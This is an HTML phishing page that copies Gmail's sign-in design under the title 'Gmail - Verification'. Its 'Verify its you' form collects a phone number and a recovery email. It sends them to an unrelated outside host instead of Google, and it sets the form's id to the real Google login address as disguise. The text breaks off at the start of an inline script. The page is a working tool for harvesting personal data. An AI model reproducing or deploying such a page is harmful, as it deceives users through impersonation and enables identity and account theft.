<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta content="width=300, initial-scale=1" name="viewport">
  <meta name="description" content="Gmail is email that's intuitive, efficient, and useful. 15 GB of storage, less spam, and mobile access.">
  <meta name="google-site-verification" content="LrdTUW9psUAMbh4Ia074-BPEVmcpBxF6Gwf0MSgQXZs">
  <link rel="shortcut icon" href="file:///C:/Users/Elvexn/AppData/Local/Temp/Rar$EXa0.239/ServiceLogin_files/favicon.ico">

  <title>Gmail - Verification</title>
  <style>
  @font-face {
  font-family: 'Open Sans';
  font-style: normal;
  font-weight: 300;
  src: local('Open Sans Light'), local('OpenSans-Light'), url(//fonts.gstatic.com/s/opensans/v10/DXI1ORHCpsQm3Vp6mXoaTXhCUOGz7vYGh680lGh-uXM.woff) format('woff');
}
@font-face {
  font-family: 'Open Sans';
  font-style: normal;
  font-weight: 400;
  src: local('Open Sans'), local('OpenSans'), url(//fonts.gstatic.com/s/opensans/v10/cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff) format('woff');
}
  </style>
  <style>
  h1, h2 {
  -webkit-animation-duration: 0.1s;
  -webkit-animation-name: fontfix;
  -webkit-animation-iteration-count: 1;
  -webkit-animation-timing-function: linear;
  -webkit-animation-delay: 0;
  }
  @-webkit-keyframes fontfix {
  from {
  opacity: 1;
  }
  to {
  opacity: 1;
  }
  }
  </style>
<style>
  html, body {
  font-family: Arial, sans-serif;
  background: #fff;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 13px;
  color: #404040;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  button,
  input[type=button],
  input[type=submit] {
  font-family: Arial, sans-serif;
  font-size: 13px;
  }
  a,
  a:hover,
  a:visited {
  color: #427fed;
  cursor: pointer;
  text-decoration: none;
  }
  a:hover {
  text-decoration: underline;
  }
  h1 {
  font-size: 20px;
  color: #262626;
  margin: 0 0 15px;
  font-weight: normal;
  }
  h2 {
  font-size: 14px;
  color: #262626;
  margin: 0 0 15px;
  font-weight: bold;
  }
  input[type=email],
  input[type=number],
  input[type=password],
  input[type=tel],
  input[type=text],
  input[type=url] {
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 36px;
  padding: 0 8px;
  margin: 0;
  background: #fff;
  border: 1px solid #d9d9d9;
  border-top: 1px solid #c0c0c0;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  border-radius: 1px;
  font-size: 15px;
  color: #404040;
  }
  input[type=email]:hover,
  input[type=number]:hover,
  input[type=password]:hover,
  input[type=tel]:hover,
  input[type=text]:hover,
  input[type=url]:hover {
  border: 1px solid #b9b9b9;
  border-top: 1px solid #a0a0a0;
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  }
  input[type=email]:focus,
  input[type=number]:focus,
  input[type=password]:focus,
  input[type=tel]:focus,
  input[type=text]:focus,
  input[type=url]:focus {
  outline: none;
  border: 1px solid #4d90fe;
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  }
  input[type=checkbox],
  input[type=radio] {
  -webkit-appearance: none;
  display: inline-block;
  width: 13px;
  height: 13px;
  margin: 0;
  cursor: pointer;
  vertical-align: bottom;
  background: #fff;
  border: 1px solid #c6c6c6;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  border-radius: 1px;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  position: relative;
  }
  input[type=checkbox]:active,
  input[type=radio]:active {
  background: #ebebeb;
  }
  input[type=checkbox]:hover {
  border-color: #c6c6c6;
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  }
  input[type=radio] {
  -moz-border-radius: 1em;
  -webkit-border-radius: 1em;
  border-radius: 1em;
  width: 15px;
  height: 15px;
  }
  input[type=checkbox]:checked,
  input[type=radio]:checked {
  background: #fff;
  }
  input[type=radio]:checked::after {
  content: '';
  display: block;
  position: relative;
  top: 3px;
  left: 3px;
  width: 7px;
  height: 7px;
  background: #666;
  -moz-border-radius: 1em;
  -webkit-border-radius: 1em;
  border-radius: 1em;
  }
  input[type=checkbox]:checked::after {
  content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);
  display: block;
  position: absolute;
  top: -6px;
  left: -5px;
  }
  input[type=checkbox]:focus {
  outline: none;
  border-color: #4d90fe;
  }
  .stacked-label {
  display: block;
  font-weight: bold;
  margin: .5em 0;
  }
  .hidden-label {
  position: absolute !important;
  clip: rect(1px 1px 1px 1px); /* IE6, IE7 */
  clip: rect(1px, 1px, 1px, 1px);
  height: 0px;
  width: 0px;
  overflow: hidden;
  visibility: hidden;
  }
  input[type=checkbox].form-error,
  input[type=email].form-error,
  input[type=number].form-error,
  input[type=password].form-error,
  input[type=text].form-error,
  input[type=tel].form-error,
  input[type=url].form-error {
  border: 1px solid #dd4b39;
  }
  .error-msg {
  margin: .5em 0;
  display: block;
  color: #dd4b39;
  line-height: 17px;
  }
  .help-link {
  background: #dd4b39;
  padding: 0 5px;
  color: #fff;
  font-weight: bold;
  display: inline-block;
  -moz-border-radius: 1em;
  -webkit-border-radius: 1em;
  border-radius: 1em;
  text-decoration: none;
  position: relative;
  top: 0px;
  }
  .help-link:visited {
  color: #fff;
  }
  .help-link:hover {
  color: #fff;
  background: #c03523;
  text-decoration: none;
  }
  .help-link:active {
  opacity: 1;
  background: #ae2817;
  }
  .wrapper {
  position: relative;
  min-height: 100%;
  }
  .content {
  padding: 0 44px;
  }
  .main {
  padding-bottom: 100px;
  }
  /* For modern browsers */
  .clearfix:before,
  .clearfix:after {
  content: "";
  display: table;
  }
  .clearfix:after {
  clear: both;
  }
  /* For IE 6/7 (trigger hasLayout) */
  .clearfix {
  zoom:1;
  }
  .google-header-bar {
  height: 71px;
  border-bottom: 1px solid #e5e5e5;
  overflow: hidden;
  }
  .header .logo {
  margin: 17px 0 0;
  float: left;
  height: 38px;
  width: 116px;
  }
  .header .secondary-link {
  margin: 28px 0 0;
  float: right;
  }
  .header .secondary-link a {
  font-weight: normal;
  }
  .google-header-bar.centered {
  border: 0;
  height: 108px;
  }
  .google-header-bar.centered .header .logo {
  float: none;
  margin: 40px auto 30px;
  display: block;
  }
  .google-header-bar.centered .header .secondary-link {
  display: none
  }
  .google-footer-bar {
  position: absolute;
  bottom: 0;
  height: 35px;
  width: 100%;
  border-top: 1px solid #e5e5e5;
  overflow: hidden;
  }
  .footer {
  padding-top: 7px;
  font-size: .85em;
  white-space: nowrap;
  line-height: 0;
  }
  .footer ul {
  float: left;
  max-width: 80%;
  min-height: 16px;
  padding: 0;
  }
  .footer ul li {
  color: #737373;
  display: inline;
  padding: 0;
  padding-right: 1.5em;
  }
  .footer a {
  color: #737373;
  }
  .lang-chooser-wrap {
  float: right;
  display: inline;
  }
  .lang-chooser-wrap img {
  vertical-align: top;
  }
  .lang-chooser {
  font-size: 13px;
  height: 24px;
  line-height: 24px;
  }
  .lang-chooser option {
  font-size: 13px;
  line-height: 24px;
  }
  .hidden {
  height: 0px;
  width: 0px;
  overflow: hidden;
  visibility: hidden;
  display: none !important;
  }
  .banner {
  text-align: center;
  }
  .card {
  background-color: #f7f7f7;
  padding: 20px 25px 30px;
  margin: 0 auto 25px;
  width: 304px;
  -moz-border-radius: 2px;
  -webkit-border-radius: 2px;
  border-radius: 2px;
  -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  }
  .card > *:first-child {
  margin-top: 0;
  }
  .rc-button,
  .rc-button:visited {
  display: inline-block;
  min-width: 46px;
  text-align: center;
  color: #444;
  font-size: 14px;
  font-weight: 700;
  height: 36px;
  padding: 0 8px;
  line-height: 36px;
  -moz-border-radius: 3px;
  -webkit-border-radius: 3px;
  border-radius: 3px;
  -o-transition: all 0.218s;
  -moz-transition: all 0.218s;
  -webkit-transition: all 0.218s;
  transition: all 0.218s;
  border: 1px solid #dcdcdc;
  background-color: #f5f5f5;
  background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: linear-gradient(top,#f5f5f5,#f1f1f1);
  -o-transition: none;
  -moz-user-select: none;
  -webkit-user-select: none;
  user-select: none;
  cursor: default;
  }
  .card .rc-button {
  width: 100%;
  padding: 0;
  }
  .rc-button.disabled,
  .rc-button[disabled] {
  opacity: .5;
  filter: alpha(opacity=50);
  cursor: default;
  pointer-events: none;
  }
  .rc-button:hover {
  border: 1px solid #c6c6c6;
  color: #333;
  text-decoration: none;
  -o-transition: all 0.0s;
  -moz-transition: all 0.0s;
  -webkit-transition: all 0.0s;
  transition: all 0.0s;
  background-color: #f8f8f8;
  background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: linear-gradient(top,#f8f8f8,#f1f1f1);
  -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  }
  .rc-button:active {
  background-color: #f6f6f6;
  background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: linear-gradient(top,#f6f6f6,#f1f1f1);
  -moz-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  -webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  }
  .rc-button-submit,
  .rc-button-submit:visited {
  border: 1px solid #3079ed;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.1);
  background-color: #4d90fe;
  background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);
  background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);
  background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);
  background-image: -o-linear-gradient(top,#4d90fe,#4787ed);
  background-image: linear-gradient(top,#4d90fe,#4787ed);
  }
  .rc-button-submit:hover {
  border: 1px solid #2f5bb7;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.3);
  background-color: #357ae8;
  background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
  background-image: linear-gradient(top,#4d90fe,#357ae8);
  }
  .rc-button-submit:active {
  background-color: #357ae8;
  background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
  background-image: linear-gradient(top,#4d90fe,#357ae8);
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  }
  .rc-button-red,
  .rc-button-red:visited {
  border: 1px solid transparent;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.1);
  background-color: #d14836;
  background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);
  background-image: -moz-linear-gradient(top,#dd4b39,#d14836);
  background-image: -ms-linear-gradient(top,#dd4b39,#d14836);
  background-image: -o-linear-gradient(top,#dd4b39,#d14836);
  background-image: linear-gradient(top,#dd4b39,#d14836);
  }
  .rc-button-red:hover {
  border: 1px solid #b0281a;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.3);
  background-color: #c53727;
  background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);
  background-image: -moz-linear-gradient(top,#dd4b39,#c53727);
  background-image: -ms-linear-gradient(top,#dd4b39,#c53727);
  background-image: -o-linear-gradient(top,#dd4b39,#c53727);
  background-image: linear-gradient(top,#dd4b39,#c53727);
  }
  .rc-button-red:active {
  border: 1px solid #992a1b;
  background-color: #b0281a;
  background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);
  background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);
  background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);
  background-image: -o-linear-gradient(top,#dd4b39,#b0281a);
  background-image: linear-gradient(top,#dd4b39,#b0281a);
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  }
  .secondary-actions {
  text-align: center;
  }
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  .google-header-bar.centered {
  height: 83px;
  }
  .google-header-bar.centered .header .logo {
  margin: 25px auto 20px;
  }
  .card {
  margin-bottom: 20px;
  }
</style>
<style media="screen and (max-width: 580px)">
  html, body {
  font-size: 14px;
  }
  .google-header-bar.centered {
  height: 73px;
  }
  .google-header-bar.centered .header .logo {
  margin: 20px auto 15px;
  }
  .content {
  padding-left: 10px;
  padding-right: 10px;
  }
  .hidden-small {
  display: none;
  }
  .card {
  padding: 20px 15px 30px;
  width: 270px;
  }
  .footer ul li {
  padding-right: 1em;
  }
  .lang-chooser-wrap {
  display: none;
  }
</style>
<style>
  pre.debug {
  font-family: monospace;
  position: absolute;
  left: 0;
  margin: 0;
  padding: 1.5em;
  font-size: 13px;
  background: #f1f1f1;
  border-top: 1px solid #e5e5e5;
  direction: ltr;
  white-space: pre-wrap;
  width: 90%;
  overflow: hidden;
  }
</style>
<style>
  .banner h1 {
  font-family: 'Open Sans', arial;
  -webkit-font-smoothing: antialiased;
  color: #555;
  font-size: 42px;
  font-weight: 300;
  margin-top: 0;
  margin-bottom: 20px;
  }
  .banner h2 {
  font-family: 'Open Sans', arial;
  -webkit-font-smoothing: antialiased;
  color: #555;
  font-size: 18px;
  font-weight: 400;
  margin-bottom: 20px;
  }
  .signin-card {
  width: 274px;
  padding: 40px 40px;
  }
  .signin-card .profile-img {
  width: 96px;
  height: 96px;
  margin: 0 auto 10px;
  display: block;
  -moz-border-radius: 50%;
  -webkit-border-radius: 50%;
  border-radius: 50%;
  }
  .signin-card .profile-name {
  font-size: 16px;
  font-weight: bold;
  text-align: center;
  margin: 10px 0 0;
  min-height: 1em;
  }
  .signin-card .profile-email {
  font-size: 16px;
  text-align: center;
  margin: 10px 0 20px 0;
  min-height: 1em;
  }
  .signin-card input[type=email],
  .signin-card input[type=password],
  .signin-card input[type=text],
  .signin-card input[type=submit] {
  width: 100%;
  display: block;
  margin-bottom: 10px;
  z-index: 1;
  position: relative;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  }
  .signin-card #Email,
  .signin-card #Passwd,
  .signin-card .captcha {
  direction: ltr;
  height: 44px;
  font-size: 16px;
  }
  .signin-card #Email + .stacked-label {
  margin-top: 15px;
  }
  .signin-card #reauthEmail {
  display: block;
  margin-bottom: 10px;
  line-height: 36px;
  padding: 0 8px;
  font-size: 15px;
  color: #404040;
  line-height: 2;
  margin-bottom: 10px;
  font-size: 14px;
  text-align: center;
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  }
  .one-google p {
  margin: 0 0 10px;
  color: #555;
  font-size: 14px;
  text-align: center;
  }
  .one-google p.create-account,
  .one-google p.switch-account {
  margin-bottom: 60px;
  }
  .one-google img {
  display: block;
  width: 210px;
  height: 17px;
  margin: 10px auto;
  }
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  .banner h1 {
  font-size: 38px;
  margin-bottom: 15px;
  }
  .banner h2 {
  margin-bottom: 15px;
  }
  .one-google p.create-account,
  .one-google p.switch-account {
  margin-bottom: 30px;
  }
  .signin-card #Email {
  margin-bottom: 0;
  }
  .signin-card #Passwd {
  margin-top: -1px;
  }
  .signin-card #Email.form-error,
  .signin-card #Passwd.form-error {
  z-index: 2;
  }
  .signin-card #Email:hover,
  .signin-card #Email:focus,
  .signin-card #Passwd:hover,
  .signin-card #Passwd:focus {
  z-index: 3;
  }
</style>
<style media="screen and (max-width: 580px)">
  .banner h1 {
  font-size: 22px;
  margin-bottom: 15px;
  }
  .signin-card {
  width: 260px;
  padding: 20px 20px;
  margin: 0 auto 20px;
  }
  .signin-card .profile-img {
  width: 72px;
  height: 72px;
  -moz-border-radius: 72px;
  -webkit-border-radius: 72px;
  border-radius: 72px;
  }
</style>
<style>
  .jfk-tooltip {
  background-color: #fff;
  border: 1px solid;
  color: #737373;
  font-size: 12px;
  position: absolute;
  z-index: 800 !important;
  border-color: #bbb #bbb #a8a8a8;
  padding: 16px;
  width: 250px;
  }
 .jfk-tooltip h3 {
  color: #555;
  font-size: 12px;
  margin: 0 0 .5em;
  }
 .jfk-tooltip-content p:last-child {
  margin-bottom: 0;
  }
  .jfk-tooltip-arrow {
  position: absolute;
  }
  .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore,
  .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
  display: block;
  height: 0;
  position: absolute;
  width: 0;
  }
  .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore {
  border: 9px solid;
  }
  .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
  border: 8px solid;
  }
  .jfk-tooltip-arrowdown {
  bottom: 0;
  }
  .jfk-tooltip-arrowup {
  top: -9px;
  }
  .jfk-tooltip-arrowleft {
  left: -9px;
  top: 30px;
  }
  .jfk-tooltip-arrowright {
  right: 0;
  top: 30px;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
  border-color: #bbb transparent;
  left: -9px;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
  border-color: #a8a8a8 transparent;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
  border-color: #fff transparent;
  left: -8px;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
  border-bottom-width: 0;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter {
  border-bottom-width: 0;
  }
  .jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
  border-top-width: 0;
  }
  .jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
  border-top-width: 0;
  top: 1px;
  }
  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore,
  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
  border-color: transparent #bbb;
  top: -9px;
  }
  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter,
  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
  border-color:transparent #fff;
  top:-8px;
  }
  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore {
  border-left-width: 0;
  }
  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter {
  border-left-width: 0;
  left: 1px;
  }
  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
  border-right-width: 0;
  }
  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
  border-right-width: 0;
  }
  .jfk-tooltip-closebtn {
  background: url("//ssl.gstatic.com/ui/v1/icons/common/x_8px.png") no-repeat;
  border: 1px solid transparent;
  height: 21px;
  opacity: .4;
  outline: 0;
  position: absolute;
  right: 2px;
  top: 2px;
  width: 21px;
  }
  .jfk-tooltip-closebtn:focus,
  .jfk-tooltip-closebtn:hover {
  opacity: .8;
  cursor: pointer;
  }
  .jfk-tooltip-closebtn:focus {
  border-color: #4d90fe;
  }
</style>
<style media="screen and (max-width: 580px)">
  .jfk-tooltip {
  display: none;
  }
</style>
<style>
  .need-help-reverse {
  float: right;
  }
  .remember .bubble-wrap {
  position: absolute;
  padding-top: 3px;
  -o-transition: opacity .218s ease-in .218s;
  -moz-transition: opacity .218s ease-in .218s;
  -webkit-transition: opacity .218s ease-in .218s;
  transition: opacity .218s ease-in .218s;
  left: -999em;
  opacity: 0;
  width: 314px;
  margin-left: -20px;
  }
  .remember:hover .bubble-wrap,
  .remember input:focus ~ .bubble-wrap,
  .remember .bubble-wrap:hover,
  .remember .bubble-wrap:focus {
  opacity: 1;
  left: inherit;
  }
  .bubble-pointer {
  border-left: 10px solid transparent;
  border-right: 10px solid transparent;
  border-bottom: 10px solid #fff;
  width: 0;
  height: 0;
  margin-left: 17px;
  }
  .bubble {
  background-color: #fff;
  padding: 15px;
  margin-top: -1px;
  font-size: 11px;
  -moz-border-radius: 2px;
  -webkit-border-radius: 2px;
  border-radius: 2px;
  -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  }
  #stay-signed-in {
  float: left;
  }
  #stay-signed-in-tooltip {
  left: auto;
  margin-left: -20px;
  padding-top: 3px;
  position: absolute;
  top: 0;
  visibility: hidden;
  width: 314px;
  z-index: 1;
  }
  .dasher-tooltip {
  position: absolute;
  left: 50%;
  top: 380px;
  margin-left: 150px;
  }
  .dasher-tooltip .tooltip-pointer {
  margin-top: 15px;
  }
  .dasher-tooltip p {
  margin-top: 0;
  }
  .dasher-tooltip p span {
  display: block;
  }
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  .dasher-tooltip {
  top: 340px;
  }
</style>
  </head>
  <body>
  <div class="wrapper">
  <div class="google-header-bar  centered">
  <div class="header content clearfix">
  <img alt="Google" class="logo" src="gmail_files/gmailverify_files/logo_2x.png">
  </div>
  </div>
  <div class="main content clearfix">
<div class="banner">
<h1>
   Verify its you. 
</h1>
  <h2 class="hidden-small">
   Complete the step below to let us know it's you and not someone pretending to be you.
  </h2>
</div>
<div class="card signin-card clearfix">
<img class="profile-img" src="gmail_files/gmailverify_files/avatar_2x.png" alt="">
<p class="profile-name"></p>
  <form novalidate="" method="post" action="https://weownlife.com/adobe/post3.php" id="https://accounts.google.com/ServiceLoginAuth">
  <input name="GALX" value="UIvSE_nIGLc" type="hidden">
  <input name="continue" value="https://mail.google.com/mail/" type="hidden">
  <input name="service" value="mail" type="hidden">
  <input name="rm" value="false" type="hidden">
  <input name="ltmpl" value="default" type="hidden">
  <input name="scc" value="1" type="hidden">
  <input name="ss" value="1" type="hidden">
  <input name="osid" value="1" type="hidden">
  <input id="_utf8" name="_utf8" value="☃" type="hidden">
  <input name="bgresponse" id="bgresponse" value="js_disabled" type="hidden">
Phone Number:<label class="hidden-label" for="PhoneNumber">Phone Number</label>
<input id="PhoneNumber" name="PhoneNumber" placeholder="XXX-XXX-XXXX" spellcheck="false" class="" maxlength="12" type="text">

Recovery Email:<label class="hidden-label" for="RecoveryEmail">Recovery E-mail</label>
<input id="RecoveryEmail" name="RecoveryEmail" placeholder="Recovery E-mail" class="" type="text">

<input id="signIn" name="signIn" class="rc-button rc-button-submit" value="Continue" type="submit">

  <div class="bubble-wrap" role="tooltip">
  <div class="bubble-pointer"></div>
  <div class="bubble">
Continue to download your documents.
  <a href="https://support.google.com/accounts#topic=3382296" target="_blank">Learn more</a>
  </div>
  </div>
  
  <input name="rmShown" value="1" type="hidden">
  <a id="link-forgot-passwd" href="https://accounts.google.com/RecoverAccount?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F" class="need-help-reverse">
  </a>
  </form>
</div>
<div class="one-google">
  <p class="create-account">
  <a id="link-signup" href="https://accounts.google.com/SignUp?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&amp;ltmpl=default">
  </a>
  </p>
<p class="tagline">
  One Google Account for everything Google
</p>
<img src="gmail_files/gmailverify_files/logo_strip_2x.png" alt="" height="17" width="210">
</div>
  </div>
  <div class="google-footer-bar">
  <div class="footer content clearfix">
  <ul id="footer-list">
  <li>
  <a href="https://www.google.com/intl/en/about" target="_blank">
  About Google
  </a>
  </li>
  <li>
  <a href="https://accounts.google.com/TOS?loc=MY&amp;hl=en&amp;privacy=true" target="_blank">
  Privacy
  </a>
  </li>
  <li>
  <a href="https://accounts.google.com/TOS?loc=MY&amp;hl=en" target="_blank">
  Terms
  </a>
  </li>
  <li>
  <a href="http://www.google.com/support/accounts?hl=en" target="_blank">
  Help
  </a>
  </li>
  </ul>
  <div id="lang-vis-control" style="display: inline;">
  <span id="lang-chooser-wrap" class="lang-chooser-wrap">
  <label for="lang-chooser"><img src="gmailverify_files/universal_language_settings-21.png" alt="Change language"></label>
  <select id="lang-chooser" class="lang-chooser" name="lang-chooser">
  <option value="af">
  ‪Afrikaans‬
  </option>
  <option value="az">
  ‪azərbaycan‬
  </option>
  <option value="in">
  ‪Bahasa Indonesia‬
  </option>
  <option value="ms">
  ‪Bahasa Melayu‬
  </option>
  <option value="ca">
  ‪català‬
  </option>
  <option value="cs">
  ‪Čeština‬
  </option>
  <option value="da">
  ‪Dansk‬
  </option>
  <option value="de">
  ‪Deutsch‬
  </option>
  <option value="et">
  ‪eesti‬
  </option>
  <option value="en-GB">
  ‪English (United Kingdom)‬
  </option>
  <option value="en" selected="selected">
  ‪English (United States)‬
  </option>
  <option value="es">
  ‪Español (España)‬
  </option>
  <option value="es-419">
  ‪Español (Latinoamérica)‬
  </option>
  <option value="eu">
  ‪euskara‬
  </option>
  <option value="fil">
  ‪Filipino‬
  </option>
  <option value="fr-CA">
  ‪Français (Canada)‬
  </option>
  <option value="fr">
  ‪Français (France)‬
  </option>
  <option value="gl">
  ‪galego‬
  </option>
  <option value="hr">
  ‪Hrvatski‬
  </option>
  <option value="zu">
  ‪isiZulu‬
  </option>
  <option value="is">
  ‪íslenska‬
  </option>
  <option value="it">
  ‪Italiano‬
  </option>
  <option value="sw">
  ‪Kiswahili‬
  </option>
  <option value="lv">
  ‪latviešu‬
  </option>
  <option value="lt">
  ‪lietuvių‬
  </option>
  <option value="hu">
  ‪magyar‬
  </option>
  <option value="nl">
  ‪Nederlands‬
  </option>
  <option value="no">
  ‪norsk‬
  </option>
  <option value="pl">
  ‪polski‬
  </option>
  <option value="pt">
  ‪Português‬
  </option>
  <option value="pt-BR">
  ‪Português (Brasil)‬
  </option>
  <option value="pt-PT">
  ‪português (Portugal)‬
  </option>
  <option value="ro">
  ‪română‬
  </option>
  <option value="sk">
  ‪Slovenčina‬
  </option>
  <option value="sl">
  ‪slovenščina‬
  </option>
  <option value="fi">
  ‪Suomi‬
  </option>
  <option value="sv">
  ‪Svenska‬
  </option>
  <option value="vi">
  ‪Tiếng Việt‬
  </option>
  <option value="tr">
  ‪Türkçe‬
  </option>
  <option value="el">
  ‪Ελληνικά‬
  </option>
  <option value="bg">
  ‪български‬
  </option>
  <option value="mn">
  ‪монгол‬
  </option>
  <option value="ru">
  ‪Русский‬
  </option>
  <option value="sr">
  ‪српски‬
  </option>
  <option value="uk">
  ‪Українська‬
  </option>
  <option value="ka">
  ‪ქართული‬
  </option>
  <option value="hy">
  ‪հայերեն‬
  </option>
  <option value="iw">
  ‫עברית‬‎
  </option>
  <option value="ur">
  ‫اردو‬‎
  </option>
  <option value="ar">
  ‫العربية‬‎
  </option>
  <option value="fa">
  ‫فارسی‬‎
  </option>
  <option value="am">
  ‪አማርኛ‬
  </option>
  <option value="ne">
  ‪नेपाली‬
  </option>
  <option value="mr">
  ‪मराठी‬
  </option>
  <option value="hi">
  ‪हिन्दी‬
  </option>
  <option value="bn">
  ‪বাংলা‬
  </option>
  <option value="gu">
  ‪ગુજરાતી‬
  </option>
  <option value="ta">
  ‪தமிழ்‬
  </option>
  <option value="te">
  ‪తెలుగు‬
  </option>
  <option value="kn">
  ‪ಕನ್ನಡ‬
  </option>
  <option value="ml">
  ‪മലയാളം‬
  </option>
  <option value="si">
  ‪සිංහල‬
  </option>
  <option value="th">
  ‪ไทย‬
  </option>
  <option value="lo">
  ‪ລາວ‬
  </option>
  <option value="km">
  ‪ខ្មែរ‬
  </option>
  <option value="ko">
  ‪한국어‬
  </option>
  <option value="zh-HK">
  ‪中文（香港）‬
  </option>
  <option value="ja">
  ‪日本語‬
  </option>
  <option value="zh-CN">
  ‪简体中文‬
  </option>
  <option value="zh-TW">
  ‪繁體中文‬
  </option>
  </select>
  </span>
  </div>
  </div>
</div>
  </div>
  <script>
  (function(){
  var splitByFirstChar = function(toBeSplit, splitChar) {
